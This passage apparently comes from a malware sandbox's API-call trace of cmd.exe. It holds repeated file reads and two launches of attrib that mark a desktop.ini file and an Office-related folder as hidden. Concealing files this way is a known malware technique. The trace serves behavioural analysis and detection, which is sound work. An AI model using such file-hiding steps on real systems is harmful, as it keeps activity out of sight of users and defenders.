lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.029] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.030] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.031] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.072] _close (_FileHandle=4) returned 0 [0163.072] FindNextFileW (in: hFindFile=0x382810, lpFindFileData=0x22f000 | out: lpFindFileData=0x22f000) returned 0 [0163.072] GetLastError () returned 0x12 [0163.072] FindClose (in: hFindFile=0x382810 | out: hFindFile=0x382810) returned 1 [0163.073] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0163.076] _close (_FileHandle=3) returned 0 [0163.076] GetConsoleTitleW (in: lpConsoleTitle=0x22f438, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.077] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0163.077] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0163.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0163.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.077] GetLastError () returned 0x2 [0163.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.077] GetLastError () returned 0x2 [0163.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0x382e80 [0163.077] FindClose (in: hFindFile=0x382e80 | out: hFindFile=0x382e80) returned 1 [0163.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.078] GetLastError () returned 0x2 [0163.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0x382e80 [0163.078] FindClose (in: hFindFile=0x382e80 | out: hFindFile=0x382e80) returned 1 [0163.078] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0163.078] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0163.078] GetConsoleTitleW (in: lpConsoleTitle=0x22f1cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.078] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f054, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f11c | out: lpAttributeList=0x22f054, lpSize=0x22f11c) returned 1 [0163.078] UpdateProcThreadAttribute (in: lpAttributeList=0x22f054, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f114, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f054, lpPreviousValue=0x0) returned 1 [0163.078] GetStartupInfoW (in: lpStartupInfo=0x22f010 | out: lpStartupInfo=0x22f010*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0163.078] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0163.078] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f0b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f0fc | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", lpProcessInformation=0x22f0fc*(hProcess=0x4c, hThread=0x50, dwProcessId=0x908, dwThreadId=0xd88)) returned 1 [0163.080] CloseHandle (hObject=0x50) returned 1 [0163.080] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0163.080] GetEnvironmentStringsW () returned 0x382e80* [0163.080] FreeEnvironmentStringsW (penv=0x382e80) returned 1 [0163.080] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0163.129] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x22eff0 | out: lpExitCode=0x22eff0*=0x0) returned 1 [0163.129] CloseHandle (hObject=0x4c) returned 1 [0163.129] _vsnwprintf (in: _Buffer=0x22f138, _BufferCount=0x13, _Format="%08X", _ArgList=0x22effc | out: _Buffer="00000000") returned 8 [0163.129] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0163.129] GetEnvironmentStringsW () returned 0x382e80* [0163.129] FreeEnvironmentStringsW (penv=0x382e80) returned 1 [0163.129] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0163.130] GetEnvironmentStringsW () returned 0x382e80* [0163.130] FreeEnvironmentStringsW (penv=0x382e80) returned 1 [0163.130] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f054 | out: lpAttributeList=0x22f054) [0163.130] GetConsoleTitleW (in: lpConsoleTitle=0x22f438, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.130] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0163.130] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0163.130] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0163.130] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.131] GetLastError () returned 0x2 [0163.131] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.131] GetLastError () returned 0x2 [0163.131] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0x382810 [0163.131] FindClose (in: hFindFile=0x382810 | out: hFindFile=0x382810) returned 1 [0163.131] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0xffffffff [0163.131] GetLastError () returned 0x2 [0163.131] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0x382810 [0163.131] FindClose (in: hFindFile=0x382810 | out: hFindFile=0x382810) returned 1 [0163.131] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0163.131] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0163.131] GetConsoleTitleW (in: lpConsoleTitle=0x22f1cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.131] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f054, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f11c | out: lpAttributeList=0x22f054, lpSize=0x22f11c) returned 1 [0163.131] UpdateProcThreadAttribute (in: lpAttributeList=0x22f054, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f114, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f054, lpPreviousValue=0x0) returned 1 [0163.131] GetStartupInfoW (in: lpStartupInfo=0x22f010 | out: lpStartupInfo=0x22f010*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0163.132] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0163.132] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f0b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f0fc | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"", lpProcessInformation=0x22f0fc*(hProcess=0x50, hThread=0x4c, dwProcessId=0xea8, dwThreadId=0xf3c)) returned 1 [0163.133] CloseHandle (hObject=0x4c) returned 1 [0163.133] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0163.133] GetEnvironmentStringsW () returned 0x3838e0* [0163.133] FreeEnvironmentStringsW (penv=0x3838e0) returned 1 [0163.133] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0163.170] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22eff0 | out: lpExitCode=0x22eff0*=0x0) returned 1 [0163.170] CloseHandle (hObject=0x50) returned 1 [0163.170] _vsnwprintf (in: _Buffer=0x22f138, _BufferCount=0x13, _Format="%08X", _ArgList=0x22effc | out: _Buffer="00000000") returned 8 [0163.170] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0163.170] GetEnvironmentStringsW () returned 0x3838e0* [0163.170] FreeEnvironmentStringsW (penv=0x3838e0) returned 1 [0163.170] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0163.170] GetEnvironmentStringsW () returned 0x3838e0* [0163.170] FreeEnvironmentStringsW (penv=0x3838e0) returned 1 [0163.170] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f054 | out: lpAttributeList=0x22f054) [0163.170] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.170] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0163.171] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.171] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0163.171] _get_osfhandle (_FileHandle=0) returned 0x3 [0163.171] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0163.171] SetConsoleInputExeNameW () returned 0x1 [0163.171] GetConsoleOutputCP () returned 0x1b5 [0163.171] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0163.171] SetThreadUILanguage (LangId=0x0) returned 0x409 [0163.171] exit (_Code=0) Process: id = "281" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16920" os_pid = "0x720" 